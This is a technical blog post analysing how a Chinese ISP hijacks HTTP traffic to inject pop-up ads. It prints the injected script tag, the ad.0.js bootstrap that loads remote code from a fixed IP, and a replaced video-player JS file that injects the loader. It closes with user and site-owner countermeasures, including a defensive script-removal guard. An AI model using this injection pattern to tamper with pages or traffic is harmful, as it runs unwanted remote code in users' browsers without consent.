China Telecom hijacks HTTP traffic to insert ads

Phenomenon

My home broadband is from Zhejiang Telecom. When I visit a web page in a browser, a floating advertisement often pops up in the lower right corner of the page. A typical one looks like this:

The ad has several features:

  • Ads can pop up on both Chinese and foreign websites.
  • Some well-known websites, such as Sina Weibo and Stack Overflow, do not seem to get the ads.
  • For a given website, the ad pops up only on the first visit each day; once it has been shown, refreshing the page does not bring it back, but it may appear again the next day.
  • All HTTPS sites are ad-free.

Analysis

Who added the ad

After seeing the advertisement a few times I first assumed it was ad-network code added by the website itself, and my first reaction was to block it with the browser's ad-blocking extension. Inspecting the DOM in Chrome, the embed code of the ad turned out to be the following:

<script src="http://116.252.178.232:9991/ad.0.js?v=3.9411&sp=9999&ty=dpc&sda_man=XFpdU1RJWFdZXlE=" type="text/javascript" id="bdstat"></script>

It usually appears just before </body>, i.e. at the end of the HTML body. The server address 116.252.178.232 belongs to Guangxi Telecom.

When the same Chinese advertisement popped up on several foreign websites, I was sure it was not ad code added by the websites themselves. Searching for this IP address turns up plenty of reports that it is an advertisement inserted by the ISP hijacking HTTP traffic.

The more precise name for this practice is "online direct advertising", which Baidu Baike describes as follows:

Online direct advertising is built on China Telecom's broadband access network. By analysing users' online behaviour, the system actively, selectively, strategically and in a personalized way pushes advertising information to users as they go online or during their browsing session. According to the type of website the user is currently browsing, it matches the corresponding industry keywords and, based on those keywords, pushes multimedia interactive advertising content such as animation, sound, video and games to the user. Keyword categories: computers, communications, automobiles, finance, medicine, real estate, tourism, education, recruitment, beauty, film, games, digital products, etc.

So this code is an online direct advertisement inserted by the ISP. Since all of a user's traffic has to pass through the ISP, the ISP has the opportunity to add advertisements to any website and turn the entire network into a tool for its own profit. Searching shows that not only China Telecom but also China Unicom engages in similar behaviour. It was also exposed on the March 15 consumer rights program one year, after which ISPs in various places restrained themselves somewhat, but my home Zhejiang Telecom connection still serves these ads every day.

How the ad is inserted

Fetching the ad bootstrap code above in a browser, the content of http://116.252.178.237:9991/ad.0.js, reformatted, is as follows:

var bcdata_sp = "";
var sda_man = "";
var bcdata_src = "0";
(function () {
	var a = function (h, f) {
		try {
			var d = document.createElement("span");
			d.innerHTML = h;
			api.writeO(d, f)
		} catch (g) {
			document.write(h)
		}
	};
	var c = function (d, f) {
		if (f) {
			f.appendChild(d);
			f.parentNode.appendChild(d)
		} else {
			var g = f || document.all || document.getElementsByTagName("*");
			var f = g[g.length - 1]
		}
		f.parentNode.appendChild(d)
	};
	var b = document.createElement("script");
	b.type = "text/javascript";
	b.src = "http://116.252.178.237:9991/main.js?ver=v48";
	c(b)
})();

This bootstrap code adds another script node to the DOM that loads http://116.252.178.237:9991/main.js; main.js is what actually creates the pop-up ad.

So when is ad.0.js inserted? On different websites the position of the ad.0.js node is not fixed, and it is not always just before </body>. Looking at the response body of each request in Chrome's Network tool, the HTML of the page is normal and contains no ad.0.js node. So I suspected that some JS file had been tampered with and was inserting the ad bootstrap node into the DOM while it ran.

Checking the .js files for any containing "116.252.178.232": taking one website as an example, the content of flowplayer.min.js is abnormal. This file is a video player used on the page, hosted on Qiniu CDN. Its URL is http://***.qiniudn.com/static/player/flowplayer.min.js, and the content shown in Chrome is as follows:

(function () {
	o = "http://***.qiniudn.com/static/player/flowplayer.min.js?";
	sh = "http://116.252.178.232:9991/ad.0.js?v=3.9411&sp=9999&ty=dpc&sda_man=XFpdU1RJWFdZXlE=";
	w = window;
	d = document;
	function ins(s, dm, id) {
		e = d.createElement("script");
		e.src = s;
		e.type = "text/javascript";
		id ? e.id = id : null;
		dm.appendChild(e);
	};
	p = d.scripts[d.scripts.length - 1].parentNode;
	ins(o, p);
	ds = function () {
		db = d.body;
		if (db && !document.getElementById("bdstat")) {
			if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) {
				if (w.top == w.self) {
					ins(sh, db, "bdstat");
				}
			}
		} else {
			setTimeout("ds()", 1500);
		}
	};
	ds();
})();

The returned content of the file has been completely replaced. This code first inserts another <script> node that reloads the real flowplayer.min.js, then creates the ad bootstrap node. In Chrome you can see flowplayer.min.js requested twice, with the second request returning the correct content.

The new <script> is inserted into the parent node of the last script in the document. Since the execution order of the JS files changes, this could in theory break the normal function of the tampered page.

I did not investigate further how this ad system chooses which JS request to tamper with.

Other types of hijacking

What I analyse here is only the ad insertion method Zhejiang Telecom uses at present. Older methods used by ISPs are described online, including DNS hijacking and iframe hijacking.

DNS hijacking: for example, a user visiting Google is redirected to a page full of advertisements; or visiting a URL that does not resolve jumps to 189so.cn, Telecom's site navigation portal, which is of course very profitable.

iframe hijacking also hijacks HTTP traffic: it loads the whole visited page inside an iframe and inserts pop-up advertisements on the wrapper page outside it. What the user sees is similar to the screenshot at the beginning of this article.

Blocking methods

Users

As an ordinary user, the usual advice is to call the ISP to complain, scold customer service, and ask the ISP to cancel the "special service" on your account. I haven't tried it and I don't want to; I'll keep the ads so I can see what nasty tactics the ISP gets up to.

As an ordinary user, you can also ask a programmer you know to help with this.

As a programmer, blocking such advertisements is not difficult. First, use the browser developer tools to find the URL of the ad bootstrap code. If it is an IP address, block access to that IP on the router or with firewall software; if it is a domain name, add a hosts entry resolving it to 127.0.0.1. That is enough.

Note that blocking the IP or domain name this way is not a real fix and still has side effects. For example, the page keeps showing its loading spinner because the ad JS cannot be loaded, and the tampered page may not work properly. Others have given more complicated methods of blocking the ads, basically all requiring you to run your own proxy server; I think that is too complicated to be worth it. Here are a few reference methods:

Site owners

As a website owner, is there a way to completely get rid of the ads the ISP inserts into your site, so that users never see the annoying ads, whether or not they are able to block them themselves?

The first feasible approach is HTTPS, since HTTPS responses cannot simply be forged. Because of the poor network security situation, many websites have already moved the whole site to HTTPS. Although it adds some overhead, this is the most effective approach.

At present the ISP only hijacks JS files. A simple approach is to put all the JS on Qiniu's CDN, use the HTTPS service Qiniu provides, and change only the JS addresses in the page to HTTPS; the ISP can then no longer forge them. (Tested on one website; this method currently works.)

Another possible method is to add JS to the page that detects the nodes inserted by the ISP and deletes them. The difficulty with this approach is that ISP ad insertion varies by region and will be upgraded in the future; as a website owner you can only handle known cases, which may not always work.
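The node-removal approach just described, written out as an added example that is not the original post's code: a small in-page guard that treats every external <script> whose host is not one of the site's own hosts (or that carries the bdstat id the ad bootstrap uses in the post, or points at a bare IP:port such as 116.252.178.232:9991) as injected, removes those already in the DOM, and watches for ones added later. The hosts www.example.com and cdn.example.com in the allowlist are placeholders; the decision function is kept free of browser APIs so it can be checked outside a browser.

```javascript
// Added example (not from the original post): site-owner-side guard against injected scripts.
// Placeholder allowlist (assumption): the site's own page and CDN hosts.
const ALLOWED_SCRIPT_HOSTS = ["www.example.com", "cdn.example.com"];

// host[:port] of a script src, resolving relative URLs against the page origin.
function scriptHost(src, pageOrigin) {
  try {
    return new URL(src, pageOrigin).host;
  } catch (e) {
    return null;
  }
}

// Decide whether a script element (or a plain { src, id } record) was injected.
function isInjectedScript(script, allowed, pageOrigin) {
  if (!script.src) return false; // inline scripts belong to the page itself
  if (script.id === "bdstat") return true; // id used by the ad bootstrap in the post
  const host = scriptHost(script.src, pageOrigin);
  if (host === null) return false;
  // A bare IP address with a port, like 116.252.178.232:9991, is never one of ours.
  if (/^\d{1,3}(\.\d{1,3}){3}(:\d+)?$/.test(host)) return true;
  return !allowed.includes(host);
}

// Remove injected scripts already present, then keep watching the DOM for new ones.
// Returns the list of removed src values so the caller can report them.
function installScriptGuard(doc, allowed) {
  const origin = doc.location ? doc.location.origin : "http://localhost";
  const removed = [];
  const sweep = (nodes) => {
    for (const n of nodes) {
      if (n.tagName === "SCRIPT" && isInjectedScript(n, allowed, origin)) {
        if (n.parentNode) n.parentNode.removeChild(n);
        removed.push(n.src);
      }
    }
  };
  sweep(Array.from(doc.getElementsByTagName("script")));
  if (typeof MutationObserver !== "undefined") {
    new MutationObserver((mutations) => {
      for (const m of mutations) sweep(Array.from(m.addedNodes));
    }).observe(doc.documentElement, { childList: true, subtree: true });
  }
  return removed;
}

// In a browser, install the guard as early as possible, i.e. from the first script in <head>.
if (typeof document !== "undefined") {
  installScriptGuard(document, ALLOWED_SCRIPT_HOSTS);
}
```

The guard should be the first script in the page, and inline rather than external, since an external copy could itself be the file that gets substituted. It is best-effort, in line with the caveat above: a browser that has already started fetching an injected script is not guaranteed to cancel it when the node is removed, and a future version of the hijack that uses a different host or id will pass the allowlist until it is added.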

http://www.tuicool.com/articles/Nje6fa7
